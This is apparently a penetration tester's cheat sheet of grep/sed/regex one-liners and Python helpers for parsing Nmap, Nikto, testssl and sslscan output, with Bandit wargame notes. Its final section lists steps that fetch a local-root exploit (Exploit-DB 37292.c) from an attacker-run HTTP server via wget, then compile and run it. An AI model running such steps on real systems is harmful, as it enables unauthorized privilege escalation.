
GREP



Match Everything after a word
grep -Po 'WORD(.*)'
grep -oP '(?<=release)[^ ]*'
Print all the directories in the given path with Full Absolute Path

ls -d1 "$(pwd)"/*/ 
Grep inside a Folder Recursive
grep -nr '100068  2,3,4,5    32800/udp   cmsd'

grep -nr 'A Wordpress installation was found' | grep -v AutoRecon  | cut -d '/' -f1 | sort -u
Grep IP Address and Ports from Nmap Scan Output

egrep -v "^#|Status: Up" 113-vlan | cut -d' ' -f2,4- | sed -n -e 's/Ignored.*//p' | grep open | sed 's/\/\/\/\///g' |sed 's/\/\/\///g' | sed 's/open\///g' | sed 's#//#/#g'

Output: 
127.0.0.1 80,443
127.0.0.2 8080, 9191
List directories which don't contain sub-directory named recon.  

find . -type d -exec test -e "{}/recon" \; -prune -o -type d -print| cut -d '/' -f2
Grep data from multiple webpages and Print everything after a given word 
for ip in $(cat "$1"); do
    output=$(curl -s "http://$ip:/data" --connect-timeout 2)
    release=$(echo "$output" | grep -oP '(?<=release\=\")[^ ]*')
    echo "$ip $release"
done
Grep a string from a set of files and get only the required string

grep -nr 'X-XSS-Protection' | cut -d ":" -f1 | sed 's!.[^.]*$!!'
grep -nr 'X-XSS-Protection' | cut -d ":" -f1 | sed 's!.[^.]*$!!' | cut -d "_" -f3|  sed -z 's/\n/,/g;s/,$/\n/'

#Remove everything after Last '.' along with the . 
sed 's!.[^.]*$!!'

#Remove everything after the '.'
 sed 's![^.]*$!!' 

cut Explanation:
# -d = delimiter
# -f = field number (fields are counted by the delimiter)
# -fN- = from field N to the end of the line

SED Explanation:
for s!.[^.]*$!! in the above example
 .      --> any single character (here it ends up matching the last '.')
 [^.]*  --> zero or more characters that are not '.' (everything after that dot)
 $      --> anchored at the end of the line, so the match is the tail of the line
 !!     --> the replacement text sits between the second and third '!' (an empty string here)
 !+!    --> replace with + instead of an empty string
Grep IP Address and Port from Nmap Output

#Grep X-XSS-Protection string from Nikto Output
grep -nr 'X-XSS-Protection'| grep nikto | cut -d ":" -f1 | cut -d '/' -f3 | sed 's!.[^.]*$!!' | grep -oP '(?<=nikto)[^ ]*' |grep -oP '(?<=_)[^ ]*' |  sed -z 's/_/, /g;s/,$/\n/'

#Grep for Diffie-Hellman 1024-bit strength
grep -nR "1024"  | grep -v AutoReco | grep "testssl" | cut -d "/" -f3 | sed 's!.[^.]*$!!' | sort -u | grep -oP '(?<=_)[^ ]*' | sed -z 's/_/, /g;s/,$/\n/'

#Grep a string from testssl output and print the ip addresses & port
grep -nr "Secure Client-Initiated Renegotiation"| cut -d " " -f1 | cut -d "-" -f 1 | sed -z 's/_p/, /g;s/,$/\n/'
grep -nr "Renegotiation" | grep recon | grep testssl | grep -v "supported (OK)" | grep -v "timed out" | grep -v "FIXME" |cut -d ":" -f1 | sed 's!.[^.]*$!!' | cut -d "_" -f2- |  sed -z  's/_/,/g'

# Grep for SWEET32
grep -nr "SWEET32" | grep recon | grep testssl | grep "64 bit" |cut -d ":" -f1 | sed 's!.[^.]*$!!' | cut -d "_" -f2- |  sed -z  's/_/,/g'

#Output will be IP & Port; but we might need all the ports in a single row for each IP address
#Do it in Excel using the formulas below -->

1st Column = IP address
2nd Column = Port
3rd Column : =IF(A2=A1,C1&","&B2,B2)
4th Column : =IF(A2<>A3,"Last","")

Then filter for rows with "Last" in the 4th column (the row that carries the complete port list for each IP).
Copy paste the content :)
Grepping JSON Data

#Find Path and Line objects from JSON data and combine them 
grep -Eo '"path": "[^"]*"' curl_verify.json | sed 's/"path": "\(.*\)"/\1/' > paths.txt

#There are several "line" objects per entry; take the one that appears within 3 lines after each "path"
grep -A3 '"path":' curl_verify.json | grep -Eo '"line": [0-9]+' | awk -F ": " '{print " , " $2}' > lines.txt
paste -d ' ' paths.txt lines.txt > result.txt

#grep for all the lines with string "line"
grep -Eo '"line": [0-9]+' curl_verify.json | awk -F ": " '{print ", " $2}' > lines.txt

Replace newline with comma
sed -z 's/\n/,/g;s/,$/\n/'
Replace _ with , 
sed -z 's/_/,/g'
Regex to grep from Nmap Output 

Starting Nmap 7.93 ( https://nmap.org ) at 2022-06-07 02:49 EDT
Nmap scan report for 10.10.10.10
Host is up (0.0022s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


Sample Program:

import re

# output holds the Nmap text shown above
# Regular expression pattern to extract the service name from a port line
pattern = r'\d+\/\w+\s+\w+\s+(\w+)'

# Find service name using regular expression
matches = re.findall(pattern, output)
# Check if any matches were found
if matches:
    Service = matches[0]
Service: r'\d+\/\w+\s+\w+\s+(\w+)'
Service + Version: r'\d+\/\w+\s+\w+\s+(\S+.*)'
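A Python parser for the Nmap normal-output format shown above, added here as an example (it is not code from the original post): one regex pulls port, protocol, state, service and version per host, and a second function groups the open ports per IP so the "IP port,port" rows produced earlier with cut/sed (and the Excel formula) come straight out of the script. The scan text is a constructed sample, not real scan data.

```python
import re

# Constructed sample of Nmap normal (-oN) output for two hosts; not a real scan.
SAMPLE_NMAP = """\
Starting Nmap 7.93 ( https://nmap.org ) at 2022-06-07 02:49 EDT
Nmap scan report for 10.10.10.10
Host is up (0.0022s latency).

PORT     STATE    SERVICE VERSION
22/tcp   open     ssh     OpenSSH 9.0
80/tcp   open     http    nginx 1.18.0
139/tcp  filtered netbios-ssn
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap scan report for 10.10.10.11
Host is up (0.0031s latency).

PORT      STATE SERVICE VERSION
8080/tcp  open  http-proxy
9191/tcp  open  sun-as-jpda?
"""

# "Nmap scan report for 10.0.0.1" or "Nmap scan report for name (10.0.0.1)"
HOST_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?(\d{1,3}(?:\.\d{1,3}){3})\)?")
# port/proto, state, service, and the optional rest of the line as version
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")


def parse_nmap(text):
    """Return a list of (ip, port, proto, state, service, version) tuples."""
    rows, ip = [], None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            ip = m.group(1)          # every following port line belongs to this host
            continue
        m = PORT_RE.match(line)
        if m and ip:
            port, proto, state, service, version = m.groups()
            rows.append((ip, int(port), proto, state, service, (version or "").strip()))
    return rows


def open_ports_by_ip(rows):
    """Group open ports per IP: {'10.10.10.10': '22,80', ...}."""
    grouped = {}
    for ip, port, proto, state, service, version in rows:
        if state == "open":
            grouped.setdefault(ip, []).append(port)
    return {ip: ",".join(str(p) for p in ports) for ip, ports in grouped.items()}


if __name__ == "__main__":
    for ip, ports in open_ports_by_ip(parse_nmap(SAMPLE_NMAP)).items():
        print(ip, ports)
```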
Grep TLS Version from TestSSL 

import re
import subprocess

def deprecated_protocols(ip, port):
    cmd = "testssl"
    address = f"{ip}:{port}"
    output = subprocess.run([cmd, "--warnings", "off", "--quiet", "-p", address],
                            capture_output=True).stdout.decode().strip()

    # Remove ANSI color codes from the output
    ansi_escape = re.compile(r'\x1B(?:[@-Z\\-_]|\[[0-?]*[ -/]*[@-~])')
    output = ansi_escape.sub('', output)

    # Find every SSL/TLS protocol that testssl reports as "offered (deprecated)"
    ssl_tls_protocols = re.findall(r"(SSLv\d+|TLS \d+(\.\d+)?)\s+offered \(deprecated\)", output)

    # Keep only the protocol name (first capture group) of each match
    offered_deprecated_protocols = [protocol for protocol, _ in ssl_tls_protocols]

    # Return the deprecated SSL/TLS protocols as a single comma-separated string
    return ', '.join(offered_deprecated_protocols)
Grep TLS Version from SSLScan
import re
import subprocess

def enabled_protocols(ip, port):
    cmd = "sslscan"
    address = f"{ip}:{port}"
    output = subprocess.run([cmd, address], capture_output=True).stdout.decode().strip()

    # Remove ANSI color codes from the output
    ansi_escape = re.compile(r'\x1B(?:[@-Z\\-_]|\[[0-?]*[ -/]*[@-~])')
    output = ansi_escape.sub('', output)

    # Use regular expressions to find the status of each SSL/TLS protocol
    ssl_tls_protocols = re.findall(r"(SSLv\d+|TLSv\d+\.\d+)\s+(enabled|disabled)", output)

    # Keep only the protocols sslscan reports as enabled
    enabled = [protocol for protocol, status in ssl_tls_protocols if status == 'enabled']

    # Return the enabled SSL/TLS protocols as a single comma-separated string
    return ', '.join(enabled)

Excel Macro - Count the number of rows in each sheet and print it in the first sheet 

Sub CountRowsExcludingHeader()
    Dim ws As Worksheet
    Dim lastRow As Long
    Dim outputSheet As Worksheet
    Dim rowNum As Long
    
    Set outputSheet = ThisWorkbook.Worksheets(1)
    rowNum = 2 ' Start writing output from row 2
    
    outputSheet.Range("A1:B1").Value = Array("Sheet Name", "Number of Rows (excluding header)")
    
    For Each ws In ThisWorkbook.Worksheets
        lastRow = ws.Cells(ws.Rows.Count, 1).End(xlUp).Row
        outputSheet.Cells(rowNum, 1).Value = ws.Name
        outputSheet.Cells(rowNum, 2).Value = IIf(lastRow > 1, lastRow - 1, 0)
        rowNum = rowNum + 1
    Next ws
End Sub

Useful Sort, Order, Grep Commands 

#Order files by the size of directory/file
du -ah --max-depth=1 | sort -h

#search for a particular string
grep "millionth" data.txt       

# search in any location matching a specific user and group with size                               
find / -size 33c -user bandit7 -group bandit6 2>/dev/null      

#search for the line that occurs only once (match a count of exactly 1, not 10, 11, ...)
sort data.txt | uniq -c | grep -E '^ *1 '

#search for something with req text
strings data.txt | grep "=="                      

#find rot13 text
cat data.txt | tr a-zA-Z n-za-mN-ZA-M                      

#Count of logs
wc -l access.log    

#Count requests per client IP in the access log, most frequent first (sort -u would merge IPs with equal counts)
cut -d " " -f 1 access.log | sort | uniq -c | sort -rn

#Search inside of  files and directories
grep -Hrn 'search term' path/to/files                         

#find a file with specified name
find / -name ex*  
Playing with URL's

#Get Ip address for a list of url's
for url in $(cat text.txt); do host $url; done 

#Get the resolved IP addresses (only hosts that actually resolve)
for url in $(cat text.txt); do host $url; done | grep "has address" | cut -d " " -f 4 | sort -u

#get the links from the webpage
grep "href=" index.html | cut -d "/" -f 3 | grep "\." | cut -d '"' -f 1 | sort -u 

Bandit Solutions

#Find A FILE
find / -size 33c -user bandit7 -group bandit6 2>/dev/null   

searchsploit linux_version
cp /usr/share/exploitdb/exploits/linux/local/37292.c .    # Copy the exploit
python -m SimpleHTTPServer 7575                            # Create a python server
cd /tmp
wget http://myip:7575/37292.c          
gcc 37292.c -o exploit
./exploit
id


